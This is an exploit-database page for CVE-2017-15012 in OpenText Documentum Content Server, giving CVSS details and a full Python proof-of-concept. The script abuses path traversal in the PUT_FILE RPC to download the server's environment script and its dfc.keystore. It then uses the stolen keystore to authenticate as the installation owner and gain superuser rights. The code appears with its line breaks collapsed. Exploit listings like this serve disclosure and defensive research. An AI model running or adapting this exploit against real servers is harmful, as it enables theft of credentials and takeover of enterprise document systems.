Exploitalert - Database of Exploits

Opentext Documentum Content Server File Hijack / Privilege Escalation

CVE	Category	Price	Severity
CVE-2017-15012	CWE-287	$5,000	High

Author	Risk	Exploitation Type	Date
Thierry Amarger	High	Remote	2017-10-15

CPE
cpe:cpe:/a:opentext:documentum_content_server

CVSS	EPSS	EPSSP
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H	0.26386	0.53843

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Local	AV	The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2017100115

Opentext Documentum Content Server File Hijack / Privilege Escalation

#!/usr/bin/env python # Opentext Documentum Content Server (formerly known as EMC Documentum Content Server) # does not properly validate input of PUT_FILE RPC-command which allows any # authenticated user to hijack arbitrary file from Content Server filesystem, # because some files on Content Server filesystem are security-sensitive # the security flaw described above leads to privilege escalation # # The PoC below demonstrates this vulnerability: # # MacBook-Pro:~ $ python CVE-2017-15012.py # usage: # CVE-2017-15012.py host port user password # MacBook-Pro:~ $ python CVE-2017-15012.py docu72dev01 10001 dm_bof_registry dm_bof_registry # Trying to connect to docu72dev01:10001 as dm_bof_registry ... # Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377 Linux64.Oracle # Downloading /u01/documentum/cs/product/7.2/bin/dm_set_server_env.sh # Trying to find any object with content... # Downloading /u01/documentum/cs/shared/config/dfc.keystore # Trying to find any object with content... # Trying to connect to docu72dev01:10001 as dmadmin ... # Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377 Linux64.Oracle # P0wned! # # import socket import sys from os.path import basename from dctmpy.docbaseclient import DocbaseClient, NULL_ID from dctmpy.identity import Identity from dctmpy.obj.typedobject import TypedObject CIPHERS = "ALL:aNULL:!eNULL" def usage(): print "usage:\n\t%s host port user password" % basename(sys.argv[0]) def main(): if len(sys.argv) != 5: usage() exit(1) (session, docbase) = create_session(*sys.argv[1:5]) if is_super_user(session): print "Current user is a superuser, nothing to do" exit(1) admin_console = session.get_by_qualification( "dm_method where object_name='dm_JMSAdminConsole'") env_script = admin_console['method_verb'] env_script = env_script.replace('dm_jms_admin.sh', 'dm_set_server_env.sh') keystore_path = None script = str(download(session, env_script, bytearray())) if not script: print "Unable to download dm_set_server_env.sh" exit(1) for l in script.splitlines(): if not l.startswith("DOCUMENTUM_SHARED"): continue keystore_path = l.split('=')[1] break if not keystore_path: print "Unable to determine DOCUMENTUM_SHARED" exit(1) keystore_path += "/config/dfc.keystore" keystore = str(download(session, keystore_path, bytearray())) if not keystore: print "Unable to download dfc.keystore" exit(1) (session, docbase) = create_session( sys.argv[1], sys.argv[2], session.serverconfig['r_install_owner'], "", identity=Identity(trusted=True, keystore=keystore)) if is_super_user(session): print "P0wned!" def download(session, path, buf): print "Downloading %s" % path print "Trying to find any object with content..." object_id = session.query( "SELECT FOR READ r_object_id " "FROM dm_sysobject WHERE r_content_size>0") \ .next_record()['r_object_id'] session.apply(None, NULL_ID, "BEGIN_TRANS") store = session.get_by_qualification("dm_filestore") format = session.get_by_qualification("dm_format") remote_path = "common=/../../../../../../../../../..%s=Directory" % path result = session.put_file(store.object_id(), remote_path, format.object_id()) full_size = result['FULL_CONTENT_SIZE'] ticket = result['D_TICKET'] content_id = session.next_id(0x06) obj = TypedObject(session=session) obj.set_string("OBJECT_TYPE", "dmr_content") obj.set_bool("IS_NEW_OBJECT", True) obj.set_int("i_vstamp", 0) obj.set_id("storage_id", store.object_id()) obj.set_id("format", format.object_id()) obj.set_int("data_ticket", ticket) obj.set_id("parent_id", object_id) if not session.save_cont_attrs(content_id, obj): raise RuntimeError("Unable to save content object") handle = session.make_puller( NULL_ID, store.object_id(), content_id, format.object_id(), ticket ) if handle == 0: raise RuntimeError("Unable make puller") for chunk in session.download(handle): buf.extend(chunk) return buf def create_session(host, port, user, pwd, identity=None): print "Trying to connect to %s:%s as %s ..." % \ (host, port, user) session = None try: session = DocbaseClient( host=host, port=int(port), username=user, password=pwd, identity=identity) except socket.error, e: if e.errno == 54: session = DocbaseClient( host=host, port=int(port), username=user, password=pwd, identity=identity, secure=True, ciphers=CIPHERS) else: raise e docbase = session.docbaseconfig['object_name'] version = session.serverconfig['r_server_version'] print "Connected to %s:%s, docbase: %s, version: %s" % \ (host, port, docbase, version) return (session, docbase) def is_super_user(session): user = session.get_by_qualification( "dm_user WHERE user_name=USER") if user['user_privileges'] == 16: return True group = session.get_by_qualification( "dm_group where group_name='dm_superusers' " "AND any i_all_users_names=USER") if group is not None: return True return False if __name__ == '__main__': main()

Impressum